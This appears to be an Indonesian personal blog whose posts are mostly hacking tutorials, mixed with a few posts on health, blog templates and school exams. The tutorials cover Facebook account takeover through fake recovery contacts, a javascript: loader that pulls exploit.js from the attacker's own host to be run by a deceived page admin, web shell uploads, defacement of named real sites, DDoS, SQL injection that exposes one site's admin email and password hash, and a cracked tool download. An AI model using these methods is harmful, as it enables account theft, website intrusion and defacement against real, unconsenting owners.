Berhenti Ngeblog Sebentar ada Ulangan Mid Semester

Assalamualaikum Wr.Wb

Kali ini saya tidak akan posting artikel karena saya ingin memberitahukan jika dalam seminggu kedepan saya tidak bisa aktif ngeblog karena ada Ulangan Mid Semester di SMAN 2 Bangkalan.

Ulangan akan dimulai Kamis besok sehingga saya harus fokus ulangan terlebih dahulu.

Doakan saja saya bsia mendapat nilai yang bagus di Ulangan kali ini. Hehehe

Etika Seorang Hacker [ Ethical Hacker ]

Apa yang kalian pikirkan kertika mendengar kata "Hacking" ? Tindak kriminal ? Ya, sebagian orang akan menganggap demikian. Namun tahukan kalian bahwa tidak selamanya hacker adalah tindakan yang merugikan. Kadang karena hackerlah celah keamannan suatu sistem bisa diketahui dan diperbaiki.

Dan sebenarnya dalam menjalankan aksinya hacker juga punya etika-etika yang harus dipatuhi. Apa saja itu ?

1. Memiliki kemampuan mengakses komputer tampa batasan.


2. Hendaknya semua informasi yg diberikan tidak boleh dipungut bayaran apapun. Tidak ada yg boleh disembunyikan, dan di tutup tutupi.


3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.


4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.


5. Mampu berseni dikomputer [ hack is art ]


6. Komputer dapat mengubah hidup menjadi lebih baik.


7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan. [ Seperti yang dilakukan Anonymous ]


8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.
   
   
   
   


9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.


10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.

Dan setelah itu hendaknya hacker tidak menyerang targetnya secara membabibuta. Ada "aturan main" yang harus dipatuhi :

• Di atas segalanya, hormati pengetahuan & kebebasan informasi.


• Jika kalian menemukan bug untuk penetrasi, bantulah administrator melakukan patching [penambalan pada bug tersebut] atau beritahu adminnya.


• Jangan mengambil keuntungan yang tidak fair dari hack. Semata mata untuk kepuasan sendiri .
  
  
  
  


• Tidak mendistribusikan & mengumpulkan software bajakan. Tampa maksud tertentu.


• Tidak pernah mengambil resiko yang bodoh � selalu mengetahui kemampuan sendiri. Tudak brutal dalam melakukan hacking.


• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan & mengajarkan berbagai informasi & metode hacking yang diperoleh secara cuma cuma, tampa pamrih. Sehingga tidak perlu pelit jika ada newbie yang ingin meminta tutor.


• Tidak pernah meng-hack sebuah sistem untuk mencuri uang atau yang biasa disebut carding. Karena itu adalah perbuatan dosa.


• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan. Kita punya prinsip, hanya mengetes keamanan, bukan merusaknya.


• Tidak pernah secara sengaja menghapus & merusak file di komputer yang dihack. Kecuali ada tujuan tertentu yang dibenarkan. Misalnya ada file berbahaya yang harus dihapus.


• Hormati mesin yang di hack seakaan itu adalah mesinmu sendiri. Hacker sejati akan selalu bertindak berlandaskan kode etik dan aturan main.

Sekian artikel kali ini. Semoga bermanfaat.

Inilah 10 Negara Penghasil Hacker Terbaik di Dunia

Kali ini saya akan share daftar negara yang menjadi penghasil hacker terbaik di dunia. Negara mana sajakah itu ? langsung saja, Inilah Daftar Negara Penghasil Hacker Terbaik di Dunia .



1. Amerika Serikat

Nomor satu tentu saja Amerika Serikat. Di setiap ada yang namanya berita tentang "hacker" , nama USA pasti terlibat. membobol situs FBI, Situs Pemerintahan , dll bukan hal yang sulit bagi Hacker USA. Kelompok yang terkuat di Ameika adalah Topi Abu-Abu, Wikileaks, Anonymous. Namun yang paling menonjol adalah Topi Abu-Abu karena pusat Anonymous ada di Brazil



2. Turki

Sebuah negara dengan skill dan mental tinggi adalah ciri khas Hacker asal iegara Turki. Beberapa situs ternama berasal dari turki sehingga sungguh pesat seorang hacker disana, bahkan rating menunjukan bahwa negara ini sungguh sungguh patut di acungi jempol masalah hacker. Di negara ini banyak sekali Forum Underground sehingga Turki diprediksi menjadi negara dengan jumlah hacker terbanyak. . Kelompok terkuat di negara Turki ini adalah Cyber. Hacker di Negara Turki adalah Islam dan mereka tidak segan-segan membalas serangan dari hacker yang menghina Islam.



3. China

Hanya ada dua kata untuk menyebut Hacker asal China. Luar Biasa ! . Mengapa? Sudah ribuan file berhasil dibobol oleh hacker asal China. Korban dari hacker China rata-rata adalah Amerika Serikat. Hacker China mengincari 48 perusahaan kimia Amerika Serikat dan Inggris. Bhkan Hacker China diperkirakan lebih berpeluang kaya dari pada bandar narkoba.



4. India

Yang pernah saya baca pada suatu artikel dari suatu blog. Hacker India lebih dipercaya oleh Google. Alasannya karena hacker India lebih kuat dan lebih ganas dari pada hacker lainnya. Hacker India tidak setengah-setengah untuk melakukan suatu tindakan. Banyak hacker India yang ditarik ke negara Amerika Serikat untuk keamanan. Kelompok yang terkuat pada negara India adalah Dafcer.



5. Pakistan

Hacker Pakistan tidak bisa dianggap remeh karena sudah menyerang puluhan situs pemerintahan maupun situs pendidikan. sama seperti Turki, Hacker Pakistan adalah hacker Islam. Walaupun begitu, kedia negara ini sering terlibat cyberwar.



6. Indonesia

Negara yang sangat besar dan memiliki banyak penduduk di dunia mustahil kalau tidak ada hacker yang terkuat, apalagi selevel internasional. Bukti yang mencengangkan terlihat ketika perselisihan Blok Ambalat anatar Indonesia dengan Malaysia, pada perayaan kemerdekaan Malaysia tepatnya tanggal 31 Desember 2010. Hacker Indonesia meutup 500 website pemerintahan, website terkemuka di malaysia, universitas, pendidikan. Dengan tertutupnya website-website terebut Malaysia dalam sehari rugi kurang lebih Rp.7,5 Triliun. Di Indonesia kelompok yang terkenal dan sering masuk layar televisi adalah BlackHat, seperti Yogyacarderlink, Surabaya Blackhat dan lain lain. Namun sayang Blackhat di Indonesia malah diuber-uber sama Cyberpolice.



7. Jepang

Jepang sebagai negara yang memiliki teknologi-teknologi yang canggih mustahil sekali tidak disebut sebagai negara yang menciptakan hacker hebat. Hacker Jepang yang berusia 17 tahun berhasil membobol server Belanda.



8. Rusia

Negara ini tampak tenang, jarang kita dengan ada hacker asal Rusia yang berbuat ulah atau terjadi cyberwar yang melibatkan hacker Rusia. Namun siapa sangka, virus terhebat bahkan terdahsyat berasal dari sana, tidak terlalu ribet dalam attacking seperti yang kita kira dan lakukan, tapi virus mereka bisa membuat mereka untung dan bungtung bagi kita. Karena mereka adalah pencipta virus maka rata-rata dari mereka adalah pencipta antivirus. Bahkan di ada yang di jadikan sebagai security di US.



9. Italia

Hacker Italia cenderung sama seperti hacker Rusia



10. Vietnam

Kebalikan dari Indonesia, Vietnam terkenal dengan WhiteHat nya.





Refrensi :

Source

http://4rayz.blogspot.com/2012/10/10-negara-penghasil-hacker-terbesar-di.html

http://www.vikrymadz.web.id/2012/12/negara-penghasil-hacker-terkuat-di-dunia.html

Hack Facebook Menggunakan Trik 3 Teman Terpercaya

Assalamualaikum...

Sobat, saatnya bilang wow? Tunggu dulu sebelum sobat mencoba trik ini.. :p

langsung ke topik,, hehehe :D

Trik ini mudah saja, semua orang bisa melakukannya :p

yang diperlukan adalah sobat harus memiliki beberapa akun facebook minimal tiga, tapi baiknya lebih dari 3 ;) buat saja akun facebook yang bnyak.. hehehehe dan usia akun facebook itu harus lebih dari 7 hari, kalo masih baru trik ini ga kan bekerja.. :p klo sudah punya beberapa akun, langsung saja berteman dengan target ;)jangan lupa, siapkan juga email yg baru.. ;)

ini langkah2nya :

1. buka facebook.com. lalu klik forgot password / Lupa Password

2. lalu masukkan email atau username target.. klik search!

3. kalo udah ketemu akun target? klik aja "Ini Akun saya"

4. lalu pilih "Tidak lagi memiliki Akses ke sini"

5. masukkan email yg telah disiapkan sobat tadi..

6.  kemudian ada perintah untuk menjawab pertanyaan. jawab aja salah jg gpp ;)

7. saatnya memilih 3 akun palsu yg kita buat sebelumnya.. klik "Selanjutnya" lalu pilih 3 teman, disini pilihlah 3 teman yaitu beberapa facebook palsu yg sobat persiapkan sebelumnya ;)

8. lalu facebook akan mengirimkan kode keamanan ke 3 akun tadi,, kumpulkan kodenya lalu masukkan.. baiknya gunakan browser lain utk membuka 3 akun palsu sobat.. ;)

9. setelah itu facebook akan mengirimkan "Password Recovery Email" atau Pemulihan akun ke email sobat tadi.. tinggal buka email, dan reset pasasword facebooknya.

10. tarrraaa.. facebook udah bisa sobat kuasai.. :p

Note: Sobat akan menemukan sedikit perbedaan  dalam trik ini pada saat mencobanya, jadi gunakan pikiranmu untuk mengembangkannya lagi.. :p

Sekian Terimakasih ;)


UPDATE: Ini Trik lama, dan udah diperbaiki oleh pihak FB... 

Cara Hack FansPage Facebook

Selamat pagi aja,, salam berbagi..

Sekarang saya mau share sedikit tentang trik bagaimana cara hack fanspage. tapi sebelumnya saya tekankan bahwa "Akun facebook / Fanspage itu bisa di hack karna factor Human Error"..

oke langsung saja deh.. :)


Hal-hal yang perlu dipersiapkan:

1. Fanspage Exploit Download  Password: Lihat

2. Hostingan Gratis (idhostinger,nazuka,dll)

3. Script Untuk Menjalankan Exploit

4. Email ID Facebookmu

5. Gunakan Otak (Pintar2) ;)

Langkah-Langkah:

1. Edit exploit.js dengan notepad. cari bagian email ID, lalu ganti dengan email ID mu.. lalu save!

2. Buatlah Hostingan di hosting gratis, Silahkan baca Cara Membuat Hosting Gratis lalu upload exploit.js dan pastikan upload di public_html.. http://sitekamu.hostingan.com/exploit.js

3. Script untuk menjalankan Exploit.js yg sudah diupload di hostingan

javascript:(a = (b = document).createElement(“script”)).src = “http://sitekamu.hostingan.com/exploit.js“, b.body.appendChild(a); void(0)

Sekarang kamu hanya butuh mengirimkan kode Script itu kepada Admin page agar mau menjalankan kode script itu di halaman fanspagenya dengan mengkopy kode script lalu dipastekan di adressbar browser.  katakan saja ini Autolike Fanspage atau terserah gimana caranya membodohinya.. wkwkwk :p

Saran saja,, sebaiknya dicoba2 dulu karena saya tidak jamin exploit itu masih bekerja. mengingat sistem keamanan facebook yang terus diperketat.

sekian, terimakasih

Content Creator : Onix AQua

Cara Deface Dengan Encodable Upload Vulnerability | Tutorial for Newbie

Kali ini saya akan share tutorial deface dengan teknik upload. Teknik ini tergolong mudah dan masih banyak target yang vuln dengan cara ini sehingga kita bisa memilih target sepuasnya.

Oke, langsung saja kita mulai tutorialnya.

Google Dork : "intext:File Upload by Encodable"



Maka kita akan menemukan banyak target. Kita pilih salah satu. Sebagai contoh saya pilih http://www.hillconstruction.us/cgi-bin/filechucker.cgi .

Lalu kita upload file deface kita. Filenya berformat txt.



Klik tombol pilih berkas. Cari file txt nya [sebagai contoh saya namai filenya dengan nama x.txt . Lalu klik begin upload . Tunggu sampai proses upload selesai.

Sekarang coba buka link berikut http://www.hillconstruction.us/files/uploaded/x.txt

Selesai !



NB :

• Beberapa web memerlukan data seperti e-mail sebelum meng-upload . Isi saja data-data tersebut namun jangan diisi dengan e-mail asli.


• Tempat hasil deface sobat tidak selalu berada di direktori files/uploaded . Bisa saja di /upload/files/ atau /upload/userfiles/ . Tergantung dimana sobat menyimpannya.

Mencari Config Dalam Website

Hi, ketemu lagi sama ane ./Cyber404 ^_^

Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya CONFIG.

Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D

[+] BAHAN [+]

• Shell (kalau belum punya download disini)
• MySQL (kalau belum punya klik download) #recode 

1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com )

2. Klik EVAL didalam shell/backdoor kalian (lihat gambar)

3. Jika sudah, lalu klik GO (lihat gambar)

4. Lalu copy semua yang terdapat dalam kolom tersebut (lihat gambar)

5. Next, kalian klik CONFIG (tampilan seperti ini)

6. Lalu, paste kode yang kalian dapat (step 4) tadi di kolom yang disediakan (lihat gambar)

7. Lalu klik HAJAR, jika sukses tampilan kurang lebih akan seperti ini

8. Sekarang tinggal kalian panggil CONFIGnya, caranya 

# Jika kalian upload shell tadi di wp-content maka manggilnya http://domain.com/wp-content/config

*intinya ganti (nama shell kamu tadi dengan "config")

9. Jika sukses, tampilan akan seperti ini

10. Sekarang tinggal upload script "mysql.php"nya :)

Sekian tutorial dari ane ./Cyber404 , kalo kurang jelas bisa tanyakan pada (./Cyber404)

#yang belum tau cara deface dengan config silahkan kesini gan :)

#Special Thanks To : Mr. Gandrunx | X Inject

Keyword : Hack Dengan Config . Cara Mencari Website Satu Server , Deface Website Mudah

DDoS Dengan Tools ByteDOS

Kali ini saya akan kembali share tools DDoS . Tools ini bernama ByteDOS. Tools ini tergolong ringan sehingga kita dapat membuka puluhan tab sekaligus. :v . Cara Penggunaan ByteDOS pun sangatlah mudah.



Inilah langkah-langkah menggunakan ByteDOS :

1. Pertama, buka ByteDOS

2. Pilih DoS/DDoS

3. Isi IP/Host dan Port pada DoS Attack

4. Pada kolom Attack, klik semua tombol bertuliskan 0,56Mb/sec

5. Tunggu target down



Bagi yang ingin mendownload ByteDOS, saya sudah sediakan linknya.

DOWNLOAD ByteDOS - DDoS TOOLS

Deface Dengan CSRF (Cross Site Request Forgery)

Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :

• inurl:/wp-content/themes/shepard
• inurl:/wp-content/themes/money
• inurl:/wp-content/themes/clockstone
• inurl:/wp-content/themes/ambleside
• inurl:/wp-content/themes/pacifico

#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D

6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

7. Download Video Tutorial | Pass : onixidca

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)

2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)

Contoh :

http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!

Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"

5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .

Jika berhasil maka akan muncul seperti ini (lihat gambar)

6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini

#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)

Tampilan madspotshell::

7. Untuk eksekusi Index, silahkan lihat Cara Tebas Index Website Wordpress

Sekian tutor yang dapat saya berikan :)

kalo kurang jelas, boleh tanya kan pada ORANG CAKEP INI XD

Sekian :)

Keyword : Cara deface dengan CSRF , Deface Website Mudah , Cara deface website , Cara ampuh deface website

Membuat Setan Facebook (BOT KOMENTAR)

Selamat siang semua, dari apda gak ada kerjaan mending nih ane share cara buat BOT Komentar :D

Pertama tama kalian harus punya Hosting/Cpanel terlebih dahulu, kalo untuk percobaan sih pake hosting gratis aja :D ,

#MAAF, UNTUK MASALAH HOSTING KALIAN COBA CARI SENDIRI YA :p

Oke next, saya umpamakan kalian sudah punya hosting jadi bahan yang dibutuhkan selanjutnya yaitu SCRIPT BOT, untuk script bot kalian bisa ambil DISINI (Copas Semua)

Untuk akses tokennya, kalian bisa ambil DISINI

Contoh akses token : https://m.facebook.com/?_rdr#access_token=AAAAAC3zphqEBAJd8dlZCnizM6k2JsB3RTlpHafKIGLyeiEPmZBFp3zz9sk0ZB4DV90ur7kE4ZAv6rxnA0TF6hZCcpHn5ZCMSYNUMZCWADwVhQZDZD&expires_in=0

#Yang berwarna merah adalah akses tokennya

Oke, untuk pemasangan nih kalian bisa lihat DISINI

Untuk CRON JOB kalian bisa ke http://www.webcron.org

sekian tutor semrawut dari ane :D

#Nb : setelah selesai mengambil token, segera hapus aplikasi pengambilan akses token (DISINI)

KALO GAGAL JUGA, BOLEH PM SAYA DISINI

trimakasih,

Keyword : Cara Membuat Bot Like, Cara Membuat Bot Komentar, Cara Mudah Buat BOT Komentar, BOT Auto Like dan Komentar

Cara Deface Dengan Shell upload vulnerability

Langsung saja ;) 

Dork    :

inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site::

- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 

Sebelumnya Rename dulu Shellmu jadi ext. jpg

cth: shell.php.jpg / shell.php;.jpg

Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 

Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]

Video Tutorial 

Cara Tamper Data (Upload PHP file)

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.

1. Siapkan dulu file shell.php seperti : C99Shell, r57, atau lainya cari aja di google banyak
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita, Download disini
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan



6. Trus Uploads shell.php.jpg kita dan tamper


7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah


Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung

Cara Memperbaiki Replay Threaded Comment Yang Tidak Berfungsi

Wah, rasanya lega banget setelah tadi nyoba memperbaiki Thread Comment pake ligoka den berhasil. Loh, peke logika ? Ya ! Sudah puluhan cara [beneran] saya praktekin di template blog ini namun hasilnya nihil. Tidak satupun yang mampu untuk menyembuhkan kecacatan replay comment di blog ini. Akhirnya saya menggunakan pikiran saya untuk memperbaiki thread comment. Hahaha.

Bagaimana caranya ? Saya berpendapat bahwa thread comment di template bawaan blogger semuanya sama. Akhirnya saya putuskan untuk membuat blog percobaan dan mengadopsi beberapa script dari template tersebut untuk diterapkan di template blog ini. Karena dalam hal ini yang tidak berfungsi di template Madura Cyber adalah Replay Comment, maka saya mencoba untuk menyamakan script yang ada di tempalte blog ini dengan template blog percobaan. Untuk Threaded Comment , saya ganti script dari





<b:includable id='threaded_comment_js' var='post'>

  <script async='async' expr:src='data:post.commentSrc' type='text/javascript'/>



--------------- sampai -----------------------



 window.goog = window.goog || {};

        window.goog.comments = window.goog.comments || {};

        window.goog.comments.loadQueue = window.goog.comments.loadQueue || [];

        window.goog.comments.loadQueue.push(render);

      }

    })();

// ]]>

  </script>

</b:includable>

dengan script yang ada di template blog percobaan.

And its work !!!!!!

Dari sini saya mulai sadar, apapun jika dilakukan secara berlebihan hasilnya pasti tidak baik. Ya, saya hampir 10x mengkompres template blog ini. Dan mungkin sakin seringnya dikompres, ada beberapa script yang harusnya di bawah jadi pindah ke samping. Sehingga ada beberapa yang tidak berfungsi. Jadi buat teman-teman yang ingin mengkompres templatenya, lakukan sekali saja, jangan banyak banyak. Hehehe



Sekian dan terimakasih.

Cara Meminimalisir Efek Negatif Fast Food

Kali ini saya aan kembali share artikel tentang kesehatan. Berbagai restoran cepat saji menawarkan ayam goreng Amerika, nugget, burger, sosis, atau bakso.Dan tidak dapat dipungkiri hampir semua orang suka dengan makanan tersebut. Rasanya yang gurih membuat kita tidak mampu untuk menolaknya. Dimana-mana makanan ini pasti laris manis.

Namun makanan tersebut bukanlah makanan sehat. Kandungan lemaknya sangat tinggi sehingga dapat membuat seseorang menderita kolesterol tinggi dan obesitas, bahan tambahan yang dapat merusak tubuh, serta sangat sedikitnya serat adalah beberapa hal yang membuat makanan ini tidak dianjurkan untuk kesehatan. Jika sobat ingin menikmati makanan fast food tersebut, ada baiknya sobat mencoba trik dan tips berikut agar bisa menikmati fast food favorit sobat namun tetap sehat. Berikut ini beberapa keterangan penting sebelum Anda memutuskan menikmati makanan tersebut.



Ayam Goreng Amerika [Fried Chicken]

Ayam goreng Amerika atau yang sering dikenal dengan istilah fried chicken merupakan salah satu makanan cepat saji yang paling digemari. Berbagai restoran baik dari dalam dan luar negeri telah menjajakan ayam goreng ini. Mengapa ayam goreng ini kurang sehat? Dan bagaimana trik agar memakan ayam goreng ini dengan cara yang aman?



Kenapa Ayam Goreng Amerika Kurang Sehat ?:

Biasa menggunakan ayam ras yang perkembangbiakannya selalu diberi suntikan hormon.

Ayam jenis ini memiliki kandungan lemak yang banyak.

Fried Chiken digoreng emnggunakan minyak goreng bertitik didih tinggi. Minyak seperti ini mengandung kolesterol.

Agar mendapatkan kulit ayam yang kering tapi bagian dalamnya tetap nikmat, ayam digoreng dengan menggunakan deep frying pada suhu yang tinggi. Teknik ini membuat minyak semakin terserap ke dalam daging ayam, bisa mencapai 65%.



Apa Tips Agar Kita Dapat Menikmati Fried Chicken Namun Tetap Sehat ?

Kulit ayam jangan dimakan. Pada bagian kulit, lemak yang terkandung di dalamnya cukup banyak. Jika memungkinkan, bagian kulit tersebut tidak usah dimakan meskipun pada bagian tersebut memang paling nikmat.

Pilih bagian dada, karena kandungan lemak pada bagian ini lebih sedikit dari bagian paha ayam.

Makan makanan pendamping yang sehat. Salad dengan sedikit mayonaise atau sayuran merupakan menu yang dapat Anda santap agar Anda tetap memperoleh serat untuk tubuh.





Sosis dan Nugget

Sosis dan nuget juga merupakan salah satu makanan yang digemari. Misalnya untuk burger atau hotdog. Sosis dan nuget tidak hanya tersedia di restoran cepat saji, tapi juga tersedia dan dijual di berbagai pasar swalayan. Mengapa Anda juga perlu memerhatikan saat memakan sosis atau nuget? Dan bagaimana trik agar tetap sehat sewaktu menikmati sosis dan nuget?



Kenapa Sosis dan Nugget Kurang Sehat ?

Sosis dan nugget sudah melewati berbagai tahap proses pengolahan yang mengalami penambahan berbagai zat pengawet atau pewarna yang membuat kerja ginjal menjadi berat.

Menggunakan daging yang tidak jelas. Karena sudah melalui proses pengolahan, bahan yang digunakan menjadi tidak dapat diketahui dengan pasti. Bagian jeroan, kulit atau bahkan tulang rawan mungkin digunakan agar biaya produksi dapat diminimalkan.



Apa Trik agar Kita Bisa Menikmati Sosis Namun Tetap Sehat ?

Makanlah dalam porsi kecil atau berbagi agar jumlah yang dimakan tidak terlalu banyak.

Tambahkan menu sayuran dalam menu Anda seperti salad atau konsumsi buah-buahan pada saat makan selanjutnya.





Bakso

Bakso adalah fast food yang paling mudah dicari. Di mana-mana ada bakso. Bakso dengan berbagai sajiannya memang sungguh nikmat. Tapi ternyata bakso juga kurang sehat jika dimakan secara sembarangan. Kenapa bakso kurang sehat ? Dan bagaimana cara mengatasinya ?



Kenapa Bakso Kurang Sehat ?

Biasanya menggunakan daging yang berlemak tinggi yang dapat menyebabkan kolesterol.

Ada bakso yang mengandung boraks atau formalin yang sangat berbahaya untuk tubuh.



Apa saja Trik menikmati Bakso Namun Tetap Sehat ?

Kuah bakso terasa nikmat dan gurih karena memakai MSG. Kita sendiri tentu sudah tahu jika MSG itu tidak baik untuk kesehatan. Hindari pemakaian MSG saat memakan bakso.

Saos yang bahan bakunya tidak jelas [maaf, cabe busuk] dan mengandung pengawet. Tukang bakso biasanya menggunakan saos yang murah dan tidak memperdulikan kesehatan pelanggannya. Padahal saos tersebut mengandung bahan pengawet yang tidak jelas.

Minta lebih banyak sayuran. Bakso biasa dilengkapi dengan sawi atau toge. Maka agar tubuh mendapatkan serat, Anda bisa minta agar ditambahkan lebih banyak sayuran dalam mangkuk bakso Anda.



Sekian artikel kali ini. Semoga bermanfaat.



Refrensi : http://kumpulan.info/sehat/artikel-kesehatan/48-artikel-kesehatan/358-fast-food-makanan-cepat-saji-sehat.html

Tutorial SQL Injection Menggunakan Tools Havij

Kemarn saya sudah share Tools Havij 1.15 Pro version [Cracked] . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .

Oke, langsung saja kita mulai ritualnya :



Pertama, cari target lewat google dork.

Google Dork : inurl:"pages.php?id="

Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15

Step 1

Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I'm IDLE



Maka kita akan mendapat data-data sebagai berikut :



Host IP: 65.98.217.75

Web Server: Microsoft-IIS/6.0

Powered-by: ASP.NET

Powered-by: PHP/5.2.17

Keyword Found: Billing

Injection type is Integer

DB Server: MySQL >=5

Selected Column Count is 7

Valid String Column is 3

Current DB: radiesse



Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables

Step 2

Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns

Step 3

Oke, hampir berhasil. Kita menemukan kolom : admin_id, admin_email, admin_pass, admin_passo

Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data

step 4

Setelah selesai, kita lihat di kolom bawah. Kita mendapatkan data sebagai berikut : Data Found: admin_id,admin_email,admin_pass=1^admin@radiesse.com^f97c5d29941bfb1b2fdab0874906ab82

Admin ID : 1

Admin Email : admin@radiesse.com

Admin Password : f97c5d29941bfb1b2fdab0874906ab82

namun password belum di encrypt. Maka kita encrypt menggunakan fitur MD5. 

Dan kita mendapatkan data sebagai berikut : Plain text of f97c5d29941bfb1b2fdab0874906ab82 is one . Jadi passwordnya adalah one.

Sampai disini semua beres. Tinggal nyari admin loginnya. Karena ini butuh waktu yang lama, cari sendiri-sendiri aja ya Admin Loginnya. Gunakan Fitur Find Admin

Oke, sekian tutorial kali ini, selamat mencoba. 

Kalo copas kasih sumber COK !!!!!

Download Havij 1.15 Pro Version [ Cracked ]

Sebenarnya ini tools yang sudah lama. Namun karena baru sekarang internet kenceng, maka baru bisa saya share sekarang. Kali ini saya akan share tools untuk melakukan SQLi terhadap web yang rentan keamanannya. Dengan tools ini kita bisa menemukan password suatu web sehingga kita bisa login ke web.

Versi 1.15 sudah mengalami banyak perbaikan daripada versi sebelumnya.

Dan tentu saja tools ini lebih powerfull untuk melakukan injeksi daripada tools Havij versi sebelumnya.

Oke, ini Tools Havij 1.15 Pro Version nya.

Download Havij 1.15 + Crack <=== Click

Password RAR : maduracyber

Download Havij terbaru - download havij pro - download havij 1.15 crack

Cara Mengubah Tampilan Command Prompt Windows Seperti Console Linux [Backtrack]

Tampilan CMD [Command Prompt] Windows yang cuma item kadang membuat kita bosan. Nah, kali ini saya akan share trik mengubah tampilan Command Prompt di Windows agar  seperti tampilan di Backtrack.  Jadi nanti tampilan Command Prompt Windows anda akan mirip dengan Console yang ada pada LINUX Backtrack.

Selain Command Prompt menjadi Transparan, sobat juga bisa mengatur pavicon, mengatur warna text dan lain-lain. Ini contoh tampilan Command Prompt saya :

Gimana ? keren kan ?



Langsung saja ini tutorialnya :

1. Download filenya Di Sini [password : maduracyber]

2. Ekstrak file yang sudah didownload tadi.

3. Copy seluruh file yang ada di Folder ConsoleLINUX dan paste pada folder System32 [C:/windows/system32] . Ingat, yang dicopy cuma filenya, jangan sama foldernya.

4. Lakukan ujicoba dengan membuka Console Backtrack sobat dengan cara Klik Windows+R. Ketik console lalu tekan ENTER.

5. Lakukan pengaturan dengan cara klik pada menu view-edit setting kemudian masuk pada tab appearence-more. Pada layar sebelah kanan berikan centang pada Windows Transparency lalu pilih alpha. Lalu atur active windows sesuai keinginan.



Silahkan menikmati Command Prompt rasa Backtrack . :v

Kalo ada yang masih belum jelas, harap bertanya di kolom komentar .



Refrensi : www.dream-cyber.org



Cara Mengubah Tampilan Command Prompt Windows Seperti Console Linux [Backtrack]

Anggapan Yang Salah Tentang Penyakit HIV

kali ini Madura Cyber punya postingan dengan kategori/Label baru : Kesehatan

